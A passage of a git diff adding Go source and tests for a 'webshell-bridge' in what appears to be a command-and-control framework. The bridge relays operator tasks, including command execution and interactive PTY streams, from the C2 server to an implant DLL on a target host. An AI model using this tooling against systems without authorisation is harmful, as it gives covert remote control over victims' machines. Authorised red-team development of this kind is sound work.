+func (b *Bridge) connectDLL(ctx context.Context, runtime *pipelineRuntime) error { + sessionID := cryptography.RandomString(8) + channel := NewChannel(b.transport, b.cfg.DLLAddr, runtime.name) + + logs.Log.Importantf("waiting for DLL at %s ...", b.cfg.DLLAddr) + + delay := retryBaseDelay + for attempt := 1; attempt <= retryMaxAttempts; attempt++ { + select { + case <-ctx.Done(): + return ctx.Err() + default: + } + + if err := channel.Connect(ctx); err != nil { + logs.Log.Debugf("DLL not ready (attempt %d/%d): %v (retry in %s)", + attempt, retryMaxAttempts, err, delay) + if attempt == retryMaxAttempts { + return fmt.Errorf("DLL connect failed after %d attempts: %w", retryMaxAttempts, err) + } + select { + case <-ctx.Done(): + return ctx.Err() + case <-time.After(delay): + } + delay *= 2 + if delay > retryMaxDelay { + delay = retryMaxDelay + } + continue + } + break + } + logs.Log.Important("DLL connected via malefic channel") + + // Inject Age keys before Handshake so the parser can decrypt/encrypt. + if runtime.secureConfig != nil && runtime.secureConfig.Enable { + keyPair := buildInitialKeyPair(runtime.secureConfig) + if keyPair != nil { + channel.WithSecure(keyPair) + logs.Log.Debugf("Age secure mode active for DLL channel") + } + } + + sess, err := NewSession( + b.rpc, b.pipelineCtx(ctx, runtime.name), + sessionID, runtime.name, b.cfg.ListenerName, + channel, + ) + if err != nil { + _ = channel.Close() + return fmt.Errorf("create session: %w", err) + } + + channel.StartRecvLoop() + runtime.sessions.Store(sess.ID, sess) + runtime.sessionsByRawID.Store(channel.sessionID, sess) + return nil +} + +// buildInitialKeyPair assembles a KeyPair from the pipeline's SecureConfig. +// PrivateKey = server private key (to decrypt DLL messages). +// PublicKey = implant public key (to encrypt messages to DLL). +// This mirrors core.GetKeyPairForSession without per-session lookup. 
+func buildInitialKeyPair(sc *implanttypes.SecureConfig) *clientpb.KeyPair { + if sc == nil || !sc.Enable { + return nil + } + pub := strings.TrimSpace(sc.ImplantPublicKey) + priv := strings.TrimSpace(sc.ServerPrivateKey) + if pub == "" && priv == "" { + return nil + } + return &clientpb.KeyPair{ + PublicKey: pub, + PrivateKey: priv, + } +} + +// connect establishes the mTLS gRPC connection to the server. +func (b *Bridge) connect(ctx context.Context) error { + authCfg, err := mtls.ReadConfig(b.cfg.AuthFile) + if err != nil { + return fmt.Errorf("read auth config: %w", err) + } + + addr := authCfg.Address() + if b.cfg.ServerAddr != "" { + addr = b.cfg.ServerAddr + } + + options, err := mtls.GetGrpcOptions( + []byte(authCfg.CACertificate), + []byte(authCfg.Certificate), + []byte(authCfg.PrivateKey), + authCfg.Type, + ) + if err != nil { + return fmt.Errorf("get grpc options: %w", err) + } + + b.conn, err = grpc.DialContext(ctx, addr, options...) + if err != nil { + return fmt.Errorf("grpc dial: %w", err) + } + + b.rpc = listenerrpc.NewListenerRPCClient(b.conn) + return nil +} + +func (b *Bridge) shutdown() { + if err := b.stopActiveRuntime(""); err != nil { + logs.Log.Debugf("stop active runtime during shutdown: %v", err) + } + if b.jobStream != nil { + _ = b.jobStream.CloseSend() + } +} + +func (b *Bridge) runJobLoop(ctx context.Context) error { + for { + msg, err := b.jobStream.Recv() + if err != nil { + if ctx.Err() != nil || errors.Is(err, io.EOF) { + return nil + } + switch status.Code(err) { + case codes.Canceled, codes.Unavailable: + if ctx.Err() != nil { + return nil + } + } + return fmt.Errorf("job stream recv: %w", err) + } + + // Handle session key sync without sending a status response, + // matching the real listener behavior (server/listener/listener.go:360). 
+ if msg.GetCtrl() == consts.CtrlListenerSyncSession { + b.handleSyncSession(msg.GetSession()) + continue + } + + statusMsg := b.handleJobCtrl(ctx, msg) + if err := b.jobStream.Send(statusMsg); err != nil { + if ctx.Err() != nil { + return nil + } + return fmt.Errorf("job stream send: %w", err) + } + } +} + +func (b *Bridge) handleJobCtrl(ctx context.Context, msg *clientpb.JobCtrl) *clientpb.JobStatus { + statusMsg := &clientpb.JobStatus{ + ListenerId: b.cfg.ListenerName, + Ctrl: msg.GetCtrl(), + CtrlId: msg.GetId(), + Status: int32(consts.CtrlStatusSuccess), + Job: msg.GetJob(), + } + + var err error + switch msg.GetCtrl() { + case consts.CtrlPipelineStart: + err = b.handlePipelineStart(ctx, msg.GetJob()) + case consts.CtrlPipelineStop: + err = b.handlePipelineStop(msg.GetJob()) + case consts.CtrlPipelineSync: + err = b.handlePipelineSync(msg.GetJob()) + default: + err = fmt.Errorf("unsupported ctrl %q", msg.GetCtrl()) + } + + if err != nil { + statusMsg.Status = int32(consts.CtrlStatusFailed) + statusMsg.Error = err.Error() + logs.Log.Errorf("job %s failed: %v", msg.GetCtrl(), err) + } + + return statusMsg +} + +func (b *Bridge) handlePipelineStart(ctx context.Context, job *clientpb.Job) error { + pipe := job.GetPipeline() + if pipe == nil { + return fmt.Errorf("missing pipeline in start job") + } + if pipe.GetType() != pipelineType { + return fmt.Errorf("unsupported pipeline type %q", pipe.GetType()) + } + if err := b.ensurePipelineMatch(pipe.GetName()); err != nil { + return err + } + + secCfg := implanttypes.FromSecure(pipe.GetSecure()) + if secCfg.Enable { + logs.Log.Importantf("pipeline %s: Age secure mode enabled", pipe.GetName()) + } + + runtimeCtx, cancel := context.WithCancel(ctx) + runtime := &pipelineRuntime{ + name: pipe.GetName(), + ctx: runtimeCtx, + cancel: cancel, + secureConfig: secCfg, + done: make(chan struct{}), + } + + b.activeMu.Lock() + if active := b.active; active != nil { + b.activeMu.Unlock() + cancel() + if active.name == 
pipe.GetName() { + logs.Log.Debugf("pipeline %s already active", pipe.GetName()) + return nil + } + return fmt.Errorf("pipeline %s already active", active.name) + } + b.active = runtime + b.activeMu.Unlock() + + spiteStream, err := b.rpc.SpiteStream(b.pipelineCtx(runtimeCtx, runtime.name)) + if err != nil { + b.clearActiveRuntime(runtime) + cancel() + return fmt.Errorf("open spite stream: %w", err) + } + runtime.spiteStream = spiteStream + + go b.runRuntime(runtime) + logs.Log.Importantf("pipeline %s starting; waiting for DLL at %s", runtime.name, b.cfg.DLLAddr) + return nil +} + +func (b *Bridge) handlePipelineStop(job *clientpb.Job) error { + name, err := b.jobPipelineName(job) + if err != nil { + return err + } + if err := b.ensurePipelineMatch(name); err != nil { + return err + } + logs.Log.Importantf("stopping pipeline %s", name) + return b.stopActiveRuntime(name) +} + +func (b *Bridge) handlePipelineSync(job *clientpb.Job) error { + name, err := b.jobPipelineName(job) + if err != nil { + return err + } + if err := b.ensurePipelineMatch(name); err != nil { + return err + } + logs.Log.Debugf("pipeline %s sync acknowledged", name) + return nil +} + +// handleSyncSession processes CtrlListenerSyncSession from the server. +// The server pushes per-session Age key pairs after a session registers with +// secure mode enabled. We update the channel's parser so subsequent +// reads/writes use the session-specific keys. 
+func (b *Bridge) handleSyncSession(sess *clientpb.Session) { + if sess == nil { + return + } + + b.activeMu.Lock() + runtime := b.active + b.activeMu.Unlock() + if runtime == nil { + return + } + + rawID := sess.GetRawId() + val, ok := runtime.sessionsByRawID.Load(rawID) + if !ok { + logs.Log.Debugf("sync session: no session for raw ID %d", rawID) + return + } + + session := val.(*Session) + kp := sess.GetKeyPair() + if kp == nil || (kp.GetPublicKey() == "" && kp.GetPrivateKey() == "") { + logs.Log.Debugf("sync session %s: no key pair, skipping", session.ID) + return + } + + // Merge: session-specific private key takes priority, fall back to pipeline's. + merged := &clientpb.KeyPair{ + PublicKey: kp.GetPublicKey(), + PrivateKey: kp.GetPrivateKey(), + } + if runtime.secureConfig != nil { + pipelinePriv := strings.TrimSpace(runtime.secureConfig.ServerPrivateKey) + sessionPriv := strings.TrimSpace(kp.GetPrivateKey()) + if pipelinePriv != "" && sessionPriv != pipelinePriv { + merged.PrivateKey = sessionPriv + "\n" + pipelinePriv + } + } + + session.channel.WithSecure(merged) + logs.Log.Debugf("sync session %s: Age keys updated (rawID=%d)", session.ID, rawID) +} + +func (b *Bridge) jobPipelineName(job *clientpb.Job) (string, error) { + if job == nil { + return "", fmt.Errorf("missing job") + } + if pipe := job.GetPipeline(); pipe != nil && pipe.GetName() != "" { + return pipe.GetName(), nil + } + if job.GetName() != "" { + return job.GetName(), nil + } + return "", fmt.Errorf("missing pipeline name") +} + +func (b *Bridge) ensurePipelineMatch(name string) error { + if name == "" { + return fmt.Errorf("missing pipeline name") + } + if b.cfg.PipelineName != "" && name != b.cfg.PipelineName { + return fmt.Errorf("bridge configured for pipeline %s, got %s", b.cfg.PipelineName, name) + } + return nil +} + +func (b *Bridge) stopActiveRuntime(name string) error { + b.activeMu.Lock() + runtime := b.active + if runtime == nil { + b.activeMu.Unlock() + return nil + } + if name 
!= "" && runtime.name != name { + b.activeMu.Unlock() + return fmt.Errorf("active pipeline is %s, not %s", runtime.name, name) + } + b.active = nil + b.activeMu.Unlock() + + b.stopRuntime(runtime) + return nil +} + +func (b *Bridge) stopRuntime(runtime *pipelineRuntime) { + if runtime == nil { + return + } + + runtime.cancel() + if runtime.spiteStream != nil { + _ = runtime.spiteStream.CloseSend() + } + b.closeRuntimeSessions(runtime) + + select { + case <-runtime.done: + case <-time.After(2 * time.Second): + } +} + +func (b *Bridge) runRuntime(runtime *pipelineRuntime) { + syncStop := false + defer func() { + b.clearActiveRuntime(runtime) + close(runtime.done) + if syncStop { + go b.syncPipelineStop(runtime.name) + } + }() + + if err := b.connectDLL(runtime.ctx, runtime); err != nil { + if runtime.ctx.Err() == nil { + syncStop = true + logs.Log.Errorf("pipeline %s failed before session registration: %v", runtime.name, err) + } + return + } + + logs.Log.Importantf("pipeline %s active", runtime.name) + go b.checkinLoop(runtime) + b.handleSpiteStream(runtime) +} + +func (b *Bridge) closeRuntimeSessions(runtime *pipelineRuntime) { + // Cancel all streaming task pumps first. + runtime.streamTasks.Range(func(key, value interface{}) bool { + value.(context.CancelFunc)() + runtime.streamTasks.Delete(key) + return true + }) + + runtime.sessions.Range(func(key, value interface{}) bool { + runtime.sessions.Delete(key) + _ = value.(*Session).Close() + return true + }) +} + +// listenerCtx returns a context with listener metadata. +func (b *Bridge) listenerCtx(parent context.Context) context.Context { + return metadata.NewOutgoingContext(parent, metadata.Pairs( + "listener_id", b.cfg.ListenerName, + "listener_ip", b.cfg.ListenerIP, + )) +} + +// pipelineCtx returns a context with pipeline metadata. 
+func (b *Bridge) pipelineCtx(parent context.Context, pipelineName string) context.Context { + return metadata.NewOutgoingContext(parent, metadata.Pairs( + "listener_id", b.cfg.ListenerName, + "listener_ip", b.cfg.ListenerIP, + "pipeline_id", pipelineName, + )) +} + +func (b *Bridge) sessionCtx(parent context.Context, sessionID string) context.Context { + return metadata.NewOutgoingContext(parent, metadata.Pairs( + "session_id", sessionID, + "listener_id", b.cfg.ListenerName, + "listener_ip", b.cfg.ListenerIP, + "timestamp", strconv.FormatInt(time.Now().Unix(), 10), + )) +} + +// handleSpiteStream receives task requests from the server and forwards them +// through the malefic channel to the bind DLL on the target. +func (b *Bridge) handleSpiteStream(runtime *pipelineRuntime) { + for { + req, err := runtime.spiteStream.Recv() + if err != nil { + if runtime.ctx.Err() != nil || errors.Is(err, io.EOF) { + return + } + switch status.Code(err) { + case codes.Canceled, codes.Unavailable: + if runtime.ctx.Err() != nil { + return + } + } + logs.Log.Errorf("spite stream recv (%s): %v", runtime.name, err) + return + } + + spite := req.GetSpite() + sessionID := req.GetSession().GetSessionId() + if spite == nil || sessionID == "" { + continue + } + + var taskID uint32 + if t := req.GetTask(); t != nil { + taskID = t.GetTaskId() + } + + logs.Log.Debugf("task %d for session %s: %s", taskID, sessionID, spite.Name) + go b.forwardToSession(runtime, sessionID, taskID, req) + } +} + +func (b *Bridge) clearActiveRuntime(runtime *pipelineRuntime) { + if runtime == nil { + return + } + if runtime.spiteStream != nil { + _ = runtime.spiteStream.CloseSend() + } + + b.activeMu.Lock() + if b.active == runtime { + b.active = nil + } + b.activeMu.Unlock() + + b.closeRuntimeSessions(runtime) +} + +func (b *Bridge) syncPipelineStop(name string) { + if b.rpc == nil || name == "" { + return + } + _, err := b.rpc.StopPipeline(context.Background(), &clientpb.CtrlPipeline{ + Name: name, + ListenerId: 
b.cfg.ListenerName, + }) + if err != nil { + logs.Log.Errorf("sync failed pipeline stop for %s: %v", name, err) + } +} + +// forwardToSession routes a SpiteRequest to the appropriate session. +// Streaming tasks (Task.Total < 0) get a persistent response pump; unary tasks +// use the simple request/response path. +func (b *Bridge) forwardToSession(runtime *pipelineRuntime, sessionID string, taskID uint32, req *clientpb.SpiteRequest) { + sess, ok := runtime.sessions.Load(sessionID) + if !ok { + err := fmt.Errorf("session %s not found", sessionID) + logs.Log.Warnf("%v, dropping task %d", err, taskID) + b.sendTaskError(runtime, sessionID, taskID, req.GetSpite(), err) + return + } + + session := sess.(*Session) + isStreaming := req.GetTask().GetTotal() < 0 + streamKey := fmt.Sprintf("%s:%d", sessionID, taskID) + + if isStreaming { + // Check if a pump already exists (subsequent command on same stream, e.g. PTY input) + if _, exists := runtime.streamTasks.Load(streamKey); exists { + if err := session.SendTaskSpite(taskID, req.GetSpite()); err != nil { + logs.Log.Errorf("session %s task %d stream send: %v", sessionID, taskID, err) + b.sendTaskError(runtime, sessionID, taskID, req.GetSpite(), err) + } + return + } + + // New streaming task: open channel, send initial request, start pump. + ch := session.OpenTaskStream(taskID) + if err := session.SendTaskSpite(taskID, req.GetSpite()); err != nil { + session.CloseTaskStream(taskID) + logs.Log.Errorf("session %s task %d initial send: %v", sessionID, taskID, err) + b.sendTaskError(runtime, sessionID, taskID, req.GetSpite(), err) + return + } + + pumpCtx, pumpCancel := context.WithCancel(runtime.ctx) + runtime.streamTasks.Store(streamKey, pumpCancel) + go b.responsePump(runtime, session, sessionID, taskID, streamKey, ch, pumpCtx, pumpCancel) + return + } + + // Unary path: send request, wait for one response. 
+ resp, err := session.HandleUnary(taskID, req.GetSpite()) + if err != nil { + logs.Log.Errorf("session %s task %d error: %v", sessionID, taskID, err) + if !session.Alive() { + logs.Log.Warnf("session %s channel dead, removing from runtime", sessionID) + runtime.sessions.Delete(sessionID) + _ = session.Close() + } + b.sendTaskError(runtime, sessionID, taskID, req.GetSpite(), err) + return + } + if resp == nil { + err := fmt.Errorf("empty response from DLL") + logs.Log.Errorf("session %s task %d error: %v", sessionID, taskID, err) + b.sendTaskError(runtime, sessionID, taskID, req.GetSpite(), err) + return + } + + if err := b.sendSpiteResponse(runtime, sessionID, taskID, resp); err != nil { + logs.Log.Errorf("spite stream send: %v", err) + } +} + +// responsePump reads streaming responses from the DLL channel and forwards +// each one to the server's SpiteStream. Runs until the channel is closed, +// the context is cancelled, or a send error occurs. +func (b *Bridge) responsePump( + runtime *pipelineRuntime, + session *Session, + sessionID string, + taskID uint32, + streamKey string, + ch <-chan *implantpb.Spite, + ctx context.Context, + cancel context.CancelFunc, +) { + defer func() { + cancel() + runtime.streamTasks.Delete(streamKey) + session.CloseTaskStream(taskID) + logs.Log.Debugf("response pump exited for task %d on session %s", taskID, sessionID) + }() + + for { + select { + case <-ctx.Done(): + return + case spite, ok := <-ch: + if !ok { + // Channel closed (recvLoop exit or session teardown) + return + } + if err := b.sendSpiteResponse(runtime, sessionID, taskID, spite); err != nil { + logs.Log.Errorf("stream pump send for task %d: %v", taskID, err) + return + } + } + } +} + +func (b *Bridge) sendTaskError(runtime *pipelineRuntime, sessionID string, taskID uint32, req *implantpb.Spite, err error) { + name := "" + if req != nil { + name = req.GetName() + } + if sendErr := b.sendSpiteResponse(runtime, sessionID, taskID, taskErrorSpite(taskID, name, err)); 
sendErr != nil { + logs.Log.Debugf("send task error response failed: %v", sendErr) + } +} + +func taskErrorSpite(taskID uint32, name string, err error) *implantpb.Spite { + return &implantpb.Spite{ + Name: name, + TaskId: taskID, + Error: iomtypes.MaleficErrorTaskError, + Status: &implantpb.Status{ + TaskId: taskID, + Status: iomtypes.TaskErrorOperatorError, + Error: err.Error(), + }, + Body: &implantpb.Spite_Empty{ + Empty: &implantpb.Empty{}, + }, + } +} + +func (b *Bridge) sendSpiteResponse(runtime *pipelineRuntime, sessionID string, taskID uint32, spite *implantpb.Spite) error { + runtime.sendMu.Lock() + defer runtime.sendMu.Unlock() + + return runtime.spiteStream.Send(&clientpb.SpiteResponse{ + ListenerId: b.cfg.ListenerName, + SessionId: sessionID, + TaskId: taskID, + Spite: spite, + }) +} + +// checkinLoop sends periodic heartbeats for all registered sessions. +func (b *Bridge) checkinLoop(runtime *pipelineRuntime) { + ticker := time.NewTicker(checkinInterval) + defer ticker.Stop() + + for { + select { + case <-runtime.ctx.Done(): + return + case <-ticker.C: + runtime.sessions.Range(func(key, value interface{}) bool { + sess := value.(*Session) + if !sess.Alive() { + logs.Log.Warnf("session %s channel dead, removing", sess.ID) + runtime.sessions.Delete(key) + _ = sess.Close() + return true + } + sess.Checkin(b.rpc, b.sessionCtx(runtime.ctx, sess.ID)) + return true + }) + } + } +} diff --git a/server/cmd/webshell-bridge/bridge_test.go b/server/cmd/webshell-bridge/bridge_test.go new file mode 100644 index 00000000..bf5e3b4a --- /dev/null +++ b/server/cmd/webshell-bridge/bridge_test.go @@ -0,0 +1,509 @@ +package main + +import ( + "context" + "errors" + "fmt" + "io" + "net" + "sync" + "testing" + "time" + + "github.com/chainreactors/IoM-go/proto/client/clientpb" + "github.com/chainreactors/IoM-go/proto/implant/implantpb" + "github.com/chainreactors/IoM-go/proto/services/listenerrpc" + "github.com/chainreactors/malice-network/helper/implanttypes" + malefic 
"github.com/chainreactors/malice-network/server/internal/parser/malefic" + "google.golang.org/grpc" + "google.golang.org/grpc/metadata" + "google.golang.org/protobuf/proto" +) + +type blockingDialTransport struct { + started chan struct{} +} + +func (t *blockingDialTransport) DialContext(ctx context.Context, network, address string) (net.Conn, error) { + select { + case <-t.started: + default: + close(t.started) + } + <-ctx.Done() + return nil, ctx.Err() +} + +// badHandshakeTransport returns a connection that sends an invalid malefic frame. +type badHandshakeTransport struct{} + +func (t *badHandshakeTransport) DialContext(ctx context.Context, network, address string) (net.Conn, error) { + clientConn, serverConn := net.Pipe() + go func() { + defer serverConn.Close() + // Send a malefic frame with corrupt payload (invalid protobuf) + frame := []byte{ + malefic.DefaultStartDelimiter, + 0x01, 0x00, 0x00, 0x00, // sessionID = 1 + 0x03, 0x00, 0x00, 0x00, // length = 3 + 0xBA, 0xAD, 0x00, // corrupt payload + malefic.DefaultEndDelimiter, + } + serverConn.Write(frame) + }() + return clientConn, nil +} + +type fakeBridgeRPC struct { + listenerrpc.ListenerRPCClient + + mu sync.Mutex + stopCalls []*clientpb.CtrlPipeline + spiteStream listenerrpc.ListenerRPC_SpiteStreamClient +} + +func (f *fakeBridgeRPC) SpiteStream(ctx context.Context, opts ...grpc.CallOption) (listenerrpc.ListenerRPC_SpiteStreamClient, error) { + if f.spiteStream == nil { + return nil, errors.New("missing spite stream") + } + return f.spiteStream, nil +} + +func (f *fakeBridgeRPC) StopPipeline(ctx context.Context, in *clientpb.CtrlPipeline, opts ...grpc.CallOption) (*clientpb.Empty, error) { + f.mu.Lock() + defer f.mu.Unlock() + f.stopCalls = append(f.stopCalls, proto.Clone(in).(*clientpb.CtrlPipeline)) + return &clientpb.Empty{}, nil +} + +func (f *fakeBridgeRPC) StopCalls() []*clientpb.CtrlPipeline { + f.mu.Lock() + defer f.mu.Unlock() + out := make([]*clientpb.CtrlPipeline, len(f.stopCalls)) + 
copy(out, f.stopCalls) + return out +} + +type fakeSpiteStream struct { + grpc.ClientStream + + closeOnce sync.Once + closed chan struct{} +} + +func newFakeSpiteStream() *fakeSpiteStream { + return &fakeSpiteStream{ + closed: make(chan struct{}), + } +} + +func (f *fakeSpiteStream) Header() (metadata.MD, error) { return nil, nil } +func (f *fakeSpiteStream) Trailer() metadata.MD { return nil } +func (f *fakeSpiteStream) CloseSend() error { + f.closeOnce.Do(func() { + close(f.closed) + }) + return nil +} +func (f *fakeSpiteStream) Context() context.Context { return context.Background() } +func (f *fakeSpiteStream) SendMsg(m interface{}) error { + return nil +} +func (f *fakeSpiteStream) RecvMsg(m interface{}) error { + <-f.closed + return io.EOF +} +func (f *fakeSpiteStream) Send(*clientpb.SpiteResponse) error { return nil } +func (f *fakeSpiteStream) Recv() (*clientpb.SpiteRequest, error) { + <-f.closed + return nil, io.EOF +} + +func TestHandlePipelineStartReturnsBeforeDLLConnectCompletes(t *testing.T) { + transport := &blockingDialTransport{started: make(chan struct{})} + bridge := &Bridge{ + cfg: &Config{ + ListenerName: "listener-a", + DLLAddr: "127.0.0.1:13338", + }, + transport: transport, + rpc: &fakeBridgeRPC{ + spiteStream: newFakeSpiteStream(), + }, + } + + job := &clientpb.Job{ + Name: "ws-a", + Pipeline: &clientpb.Pipeline{ + Name: "ws-a", + Type: pipelineType, + }, + } + + errCh := make(chan error, 1) + go func() { + errCh <- bridge.handlePipelineStart(context.Background(), job) + }() + + select { + case err := <-errCh: + if err != nil { + t.Fatalf("handlePipelineStart returned error: %v", err) + } + case <-time.After(300 * time.Millisecond): + t.Fatal("handlePipelineStart blocked on DLL connect") + } + + select { + case <-transport.started: + case <-time.After(time.Second): + t.Fatal("background DLL connect was not started") + } + + if err := bridge.stopActiveRuntime("ws-a"); err != nil { + t.Fatalf("stopActiveRuntime failed: %v", err) + } +} + +func 
TestRunRuntimeSyncsPipelineStopAfterUnexpectedConnectFailure(t *testing.T) { + rpc := &fakeBridgeRPC{spiteStream: newFakeSpiteStream()} + bridge := &Bridge{ + cfg: &Config{ + ListenerName: "listener-b", + DLLAddr: "127.0.0.1:13338", + }, + transport: &badHandshakeTransport{}, + rpc: rpc, + } + + job := &clientpb.Job{ + Name: "ws-b", + Pipeline: &clientpb.Pipeline{ + Name: "ws-b", + Type: pipelineType, + }, + } + + if err := bridge.handlePipelineStart(context.Background(), job); err != nil { + t.Fatalf("handlePipelineStart failed: %v", err) + } + + deadline := time.Now().Add(time.Second) + for time.Now().Before(deadline) { + calls := rpc.StopCalls() + if len(calls) == 1 { + if calls[0].GetName() != "ws-b" { + t.Fatalf("stop name = %q, want %q", calls[0].GetName(), "ws-b") + } + if calls[0].GetListenerId() != "listener-b" { + t.Fatalf("stop listener_id = %q, want %q", calls[0].GetListenerId(), "listener-b") + } + return + } + time.Sleep(10 * time.Millisecond) + } + + t.Fatal("expected background stop sync after connect failure") +} + +// collectingSpiteStream records all sent SpiteResponses for test assertions. 
+type collectingSpiteStream struct { + grpc.ClientStream + + mu sync.Mutex + sent []*clientpb.SpiteResponse + closed chan struct{} + recvOnce sync.Once +} + +func newCollectingSpiteStream() *collectingSpiteStream { + return &collectingSpiteStream{ + closed: make(chan struct{}), + } +} + +func (s *collectingSpiteStream) Header() (metadata.MD, error) { return nil, nil } +func (s *collectingSpiteStream) Trailer() metadata.MD { return nil } +func (s *collectingSpiteStream) CloseSend() error { + s.recvOnce.Do(func() { close(s.closed) }) + return nil +} +func (s *collectingSpiteStream) Context() context.Context { return context.Background() } +func (s *collectingSpiteStream) SendMsg(m interface{}) error { + return nil +} +func (s *collectingSpiteStream) RecvMsg(m interface{}) error { + <-s.closed + return io.EOF +} +func (s *collectingSpiteStream) Send(resp *clientpb.SpiteResponse) error { + s.mu.Lock() + s.sent = append(s.sent, proto.Clone(resp).(*clientpb.SpiteResponse)) + s.mu.Unlock() + return nil +} +func (s *collectingSpiteStream) Recv() (*clientpb.SpiteRequest, error) { + <-s.closed + return nil, io.EOF +} +func (s *collectingSpiteStream) Sent() []*clientpb.SpiteResponse { + s.mu.Lock() + defer s.mu.Unlock() + out := make([]*clientpb.SpiteResponse, len(s.sent)) + copy(out, s.sent) + return out +} + +func TestForwardToSessionStreaming(t *testing.T) { + // Set up a mock DLL that sends 3 streaming responses for one task + mock := newMockMaleficDLL(t) + defer mock.close() + + const taskID uint32 = 500 + const numResponses = 3 + + go func() { + conn, err := mock.ln.Accept() + if err != nil { + return + } + defer conn.Close() + + // Send handshake + regSpite := &implantpb.Spites{ + Spites: []*implantpb.Spite{ + {Body: &implantpb.Spite_Register{Register: mock.register}}, + }, + } + testWriteMaleficFrame(conn, regSpite, mock.sessionID) + + // Read the initial streaming request + testReadMaleficFrame(conn) + + // Send multiple responses for the same task + for i := 0; i < 
numResponses; i++ { + resp := &implantpb.Spites{ + Spites: []*implantpb.Spite{ + { + Name: fmt.Sprintf("stream-resp-%d", i), + TaskId: taskID, + }, + }, + } + testWriteMaleficFrame(conn, resp, mock.sessionID) + } + }() + + // Build a real channel + session + ch := dialMockDLL(t, mock.addr()) + defer ch.Close() + + reg, err := ch.Handshake() + if err != nil { + t.Fatalf("handshake: %v", err) + } + _ = reg + + ch.StartRecvLoop() + + session := &Session{ + ID: "test-session", + PipelineID: "test-pipeline", + ListenerID: "test-listener", + channel: ch, + } + + stream := newCollectingSpiteStream() + runtimeCtx, runtimeCancel := context.WithCancel(context.Background()) + defer runtimeCancel() + + runtime := &pipelineRuntime{ + name: "test-pipeline", + ctx: runtimeCtx, + cancel: runtimeCancel, + spiteStream: stream, + done: make(chan struct{}), + } + runtime.sessions.Store(session.ID, session) + + bridge := &Bridge{ + cfg: &Config{ListenerName: "test-listener"}, + } + + // Forward with streaming task (Total = -1) + req := &clientpb.SpiteRequest{ + Session: &clientpb.Session{SessionId: session.ID}, + Task: &clientpb.Task{TaskId: taskID, Total: -1}, + Spite: &implantpb.Spite{Name: "start-pty"}, + } + + bridge.forwardToSession(runtime, session.ID, taskID, req) + + // Wait for all streaming responses to be forwarded + deadline := time.Now().Add(3 * time.Second) + for time.Now().Before(deadline) { + sent := stream.Sent() + if len(sent) >= numResponses { + break + } + time.Sleep(50 * time.Millisecond) + } + + sent := stream.Sent() + if len(sent) != numResponses { + t.Fatalf("expected %d responses, got %d", numResponses, len(sent)) + } + for i, resp := range sent { + expected := fmt.Sprintf("stream-resp-%d", i) + if resp.GetSpite().GetName() != expected { + t.Errorf("response %d: expected %q, got %q", i, expected, resp.GetSpite().GetName()) + } + if resp.GetTaskId() != taskID { + t.Errorf("response %d: expected taskID %d, got %d", i, taskID, resp.GetTaskId()) + } + } + +} + 
+func TestForwardToSessionUnary(t *testing.T) { + mock := newMockMaleficDLL(t) + defer mock.close() + + go mock.serve(t, 1) // Handshake + 1 Spite roundtrip + + ch := dialMockDLL(t, mock.addr()) + defer ch.Close() + + if _, err := ch.Handshake(); err != nil { + t.Fatalf("handshake: %v", err) + } + ch.StartRecvLoop() + + session := &Session{ + ID: "test-session", + PipelineID: "test-pipeline", + ListenerID: "test-listener", + channel: ch, + } + + stream := newCollectingSpiteStream() + runtimeCtx, runtimeCancel := context.WithCancel(context.Background()) + defer runtimeCancel() + + runtime := &pipelineRuntime{ + name: "test-pipeline", + ctx: runtimeCtx, + cancel: runtimeCancel, + spiteStream: stream, + done: make(chan struct{}), + } + runtime.sessions.Store(session.ID, session) + + bridge := &Bridge{ + cfg: &Config{ListenerName: "test-listener"}, + } + + // Forward with unary task (Total = 1, not streaming) + req := &clientpb.SpiteRequest{ + Session: &clientpb.Session{SessionId: session.ID}, + Task: &clientpb.Task{TaskId: 1, Total: 1}, + Spite: &implantpb.Spite{Name: "exec"}, + } + + bridge.forwardToSession(runtime, session.ID, 1, req) + + sent := stream.Sent() + if len(sent) != 1 { + t.Fatalf("expected 1 response, got %d", len(sent)) + } + if sent[0].GetSpite().GetName() != "resp:exec" { + t.Errorf("expected 'resp:exec', got %q", sent[0].GetSpite().GetName()) + } +} + +func TestHandleSyncSession(t *testing.T) { + mock := newMockMaleficDLL(t) + defer mock.close() + + go mock.serve(t, 0) // Handshake only + + ch := dialMockDLL(t, mock.addr()) + defer ch.Close() + + if _, err := ch.Handshake(); err != nil { + t.Fatalf("handshake: %v", err) + } + + session := &Session{ + ID: "test-session", + PipelineID: "test-pipeline", + ListenerID: "test-listener", + channel: ch, + } + + runtime := &pipelineRuntime{ + name: "test-pipeline", + secureConfig: &implanttypes.SecureConfig{ + Enable: true, + ServerPrivateKey: "AGE-SECRET-KEY-PIPELINE", + ImplantPublicKey: "age1pipeline", + 
}, + done: make(chan struct{}), + } + runtime.sessions.Store(session.ID, session) + runtime.sessionsByRawID.Store(ch.sessionID, session) + + bridge := &Bridge{ + cfg: &Config{ListenerName: "test-listener"}, + } + bridge.activeMu.Lock() + bridge.active = runtime + bridge.activeMu.Unlock() + + // Simulate CtrlListenerSyncSession from server + bridge.handleSyncSession(&clientpb.Session{ + RawId: ch.sessionID, + KeyPair: &clientpb.KeyPair{ + PublicKey: "age1session-specific", + PrivateKey: "AGE-SECRET-KEY-SESSION", + }, + }) + + // Verify the channel's parser got updated with merged keys + if ch.parser == nil { + t.Fatal("parser should not be nil") + } + // The parser should now have keyPair set (we can verify via WithSecure's effect) + // Since MaleficParser.keyPair is unexported, we verify indirectly: + // the fact that handleSyncSession didn't panic and the channel is still alive + if !session.Alive() { + t.Error("session should still be alive after key sync") + } +} + +func TestHandleSyncSessionUnknownRawID(t *testing.T) { + runtime := &pipelineRuntime{ + name: "test-pipeline", + done: make(chan struct{}), + } + + bridge := &Bridge{ + cfg: &Config{ListenerName: "test-listener"}, + } + bridge.activeMu.Lock() + bridge.active = runtime + bridge.activeMu.Unlock() + + // Should not panic with unknown raw ID + bridge.handleSyncSession(&clientpb.Session{ + RawId: 99999, + KeyPair: &clientpb.KeyPair{ + PublicKey: "age1unknown", + PrivateKey: "AGE-SECRET-KEY-UNKNOWN", + }, + }) +} + +var _ listenerrpc.ListenerRPC_SpiteStreamClient = (*fakeSpiteStream)(nil) +var _ listenerrpc.ListenerRPC_SpiteStreamClient = (*collectingSpiteStream)(nil) +var _ listenerrpc.ListenerRPCClient = (*fakeBridgeRPC)(nil) diff --git a/server/cmd/webshell-bridge/channel.go b/server/cmd/webshell-bridge/channel.go new file mode 100644 index 00000000..7a74bd34 --- /dev/null +++ b/server/cmd/webshell-bridge/channel.go @@ -0,0 +1,273 @@ +package main + +import ( + "context" + "fmt" + 